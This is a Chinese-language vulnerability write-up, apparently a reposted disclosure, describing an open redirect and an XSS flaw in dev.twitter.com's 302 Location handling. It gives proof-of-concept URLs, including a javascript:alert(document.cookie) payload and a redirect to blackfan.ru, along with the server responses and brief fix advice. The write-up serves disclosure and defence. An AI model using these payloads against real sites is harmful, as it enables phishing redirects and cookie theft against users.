[twitter]关于HTTP头部的重定向漏洞与XSS漏洞

Posted 挑战自我安全社区

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[twitter]关于HTTP头部的重定向漏洞与XSS漏洞相关的知识,希望对你有一定的参考价值。

  1、漏洞简介

这个漏洞发生在请求的链接中,需要用户的交互点击,是由点击的请求链接传递给302页面的location值,从而导致的漏洞

  2、漏洞证明

2.1、重定向漏洞

首先请求如下链接:

 
   
   
 
  1. https://dev.twitter.com/https:/%5cblackfan.ru/

然后http会做出如下响应:

 
   
   
 
  1. HTTP/1.1 302 Found

  2. connection: close

  3. ...

  4. location: https:/\blackfan.ru

这就导致了重定向漏洞,影响的浏览器包括:Chrome, FireFox, Opera

2.2、XSS漏洞

首先请求如下链接:

 
   
   
 
  1. https://dev.twitter.com//x:1/:///%01javascript:alert(document.cookie)/

然后http会做出如下响应:

 
   
   
 
  1. HTTP/1.1 302 Found

  2. connection: close

  3. ...

  4. location: //x:1/://dev.twitter.com/javascript:alert(document.cookie)

  5. ...

  6.  

  7.  

  8. <p>You should be redirected automatically to target URL: <a href="javascript:alert(document.cookie)">javascript:alert(document.cookie)</a>.  If not click the link.

如下图所示:

  3、修复建议

一是通过在链接中的Location值中创建一个不正确的端口,这样可以阻止火狐浏览器的重定向漏洞;
二是在链接的跳转中,对相关的链接进行严格过滤。


以上是关于[twitter]关于HTTP头部的重定向漏洞与XSS漏洞的主要内容,如果未能解决你的问题,请参考以下文章

出现错误:redirect_uri_mismatch 请求中的重定向 URI:http://localhost:8080/oauth2callback 与注册的重定向 URI 不匹配

【SSL】关于SSL的重协商,解决SSL 重协商拒绝服务安全漏洞

HTTP协议基础与web服务的重定向,跳转以及请求转发

网页常用header头部定义

PHP常用的header头部定义

PHP常用的header头部定义